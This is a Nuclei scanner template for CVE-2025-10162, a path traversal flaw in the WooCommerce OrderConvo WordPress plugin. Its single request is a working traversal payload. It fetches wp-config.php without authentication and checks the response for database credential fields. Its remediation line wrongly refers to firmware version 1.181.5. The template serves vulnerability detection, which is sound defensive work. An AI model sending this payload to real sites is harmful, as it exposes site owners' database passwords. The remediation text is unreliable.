WordPress OrderConvo < 14 - Path Traversal

id: CVE-2025-10162

info:
  name: WordPress OrderConvo < 14 - Path Traversal
  author: 0x_Akoko
  severity: high
  description: |
   WooCommerce OrderConvo WordPress plugin \u003C 14 contains a path traversal vulnerability caused by improper validation of file download paths, letting unauthenticated attackers read or download arbitrary files remotely
  impact: |
   Unauthenticated attackers can read or download arbitrary files, potentially exposing sensitive information.
  remediation: |
   Update firmware to a version later than 1.181.5 or the latest available version.
  reference:
    - https://wpscan.com/vulnerability/f878615d-955d-4365-87e0-6c928f548986/
    - https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-10162
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-10162
    cwe-id: CWE-22
    epss-score: 0.38811
    epss-percentile: 0.97316
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,wp,wp-plugin,wordpress,woocommerce,orderconvo,wooconvo,lfi,traversal,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wooconvo/v1/download-file?order_id=1&filename=../../../../wp-config.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204c6c85eeaebbe3dd7d48a0711f9ff7a91e5c8ee0f14e5e6b269073bfd8aa650a022100cfd93e6d265487a61e7fcb51f989ebc57a231723f3258f8d0697262e5820dd30:922c64590222798bb761d5b6d8e72950